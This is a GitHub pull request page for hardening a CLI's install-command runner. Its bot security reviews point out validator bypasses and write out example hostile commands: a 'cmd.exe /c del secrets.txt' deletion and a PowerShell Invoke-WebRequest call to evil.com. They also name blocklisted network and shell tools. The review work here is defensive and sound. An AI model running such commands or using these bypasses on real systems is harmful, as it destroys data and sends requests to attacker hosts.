fix(init): harden install command execution#1045
Conversation
|
Codecov Results 📊✅ Patch coverage is 96.23%. Project has 4290 uncovered lines. Files with missing lines (1)
Coverage diff@@ Coverage Diff @@
## main #PR +/-##
==========================================
+ Coverage 81.98% 82.09% +0.11%
==========================================
Files 329 329 —
Lines 23883 23958 +75
Branches 15603 15682 +79
==========================================
+ Hits 19581 19668 +87
- Misses 4302 4290 -12
- Partials 1651 1653 +2Generated by Codecov Action |
![sentry-warden[bot]](https://avatars.githubusercontent.com/in/2755838?s=60&v=4){kind=small}
There was a problem hiding this comment.
BLOCKED_EXECUTABLES can be bypassed on Windows via cmd.exe or powershell.exe indirection (src/lib/init/tools/command-utils.ts:65)
Windows shell interpreters cmd, powershell, and pwsh are absent from BLOCKED_EXECUTABLES, so a command like cmd.exe /c del sensitive_file passes all validation: no shell metacharacter, first token normalizes to "cmd" which is not blocked, and the del token is never checked against the blocklist because only the first token is validated.
Evidence
validateCommandcallsnormalizeExecutableName(firstToken)and checks only that againstBLOCKED_EXECUTABLES(line 307-308).normalizeExecutableName("cmd.exe")strips the.exeextension and returns"cmd", which is not present inBLOCKED_EXECUTABLES.- Tokens like
del,curl,wget,bashappear at positions >0 and are never checked, socmd.exe /c del secrets.txtorpowershell.exe -Command Invoke-WebRequest http://evil.compass validation and are executed byspawnwithshell: falseinrunSingleCommand. cd,pushd,popdwere just added to the blocklist in this hunk, confirming the intent to block indirect shell builtins, butcmd/powershell/pwshwere not added.
Identified by Warden security-review
|
Fixed the Windows shell-interpreter bypass in |
![sentry[bot]](https://avatars.githubusercontent.com/in/12637?s=60&v=4){kind=small}
![cursor[bot]](https://avatars.githubusercontent.com/in/1210556?s=60&v=4){kind=small}
There was a problem hiding this comment.
Cursor Bugbot has reviewed your changes and found 1 potential issue.
❌ Bugbot Autofix is OFF. To automatically fix reported issues with cloud agents, enable autofix in the Cursor dashboard.
Reviewed by Cursor Bugbot for commit f05a4a3. Configure here.
| } | ||
|
|
||
| return; | ||
| } |
There was a problem hiding this comment.
Option-value args bypass recursive setup detection
Medium Severity
findFirstNonOptionIndex skips tokens starting with - but doesn't account for options that consume a separate value argument. This lets commands like npx -p innocuous-pkg @sentry/wizard -i nextjs or npm exec --package lodash @sentry/wizard bypass isRecursiveSentrySetup, because the option's value (e.g. lodash) is misidentified as the execution-position token, causing the actual sentry wizard token at the next index to be ignored by canExecuteToken.
Additional Locations (1)
Reviewed by Cursor Bugbot for commit f05a4a3. Configure here.
1 participant
Summary
Hardens the local
sentry initcommand runner for install recovery. Windows now only uses shell execution for resolved.cmd/.batshims, while regular.execommands stay shell-free. The validator also blocks recursive Sentry setup variants and Windows shell expansion characters without adding a package-manager allowlist.Test Plan
pnpm exec vitest run test/lib/init/tools/run-commands.test.ts test/lib/init/tools/run-commands-spawn.mocked.test.tspnpm exec biome check --no-errors-on-unmatched src/lib/init/tools/command-utils.ts src/lib/init/tools/run-commands.ts test/lib/init/tools/run-commands.test.ts test/lib/init/tools/run-commands-spawn.mocked.test.tspnpm run generate:schema && pnpm run test:changed— 89 files passed, 2056 tests passed, 7 skipped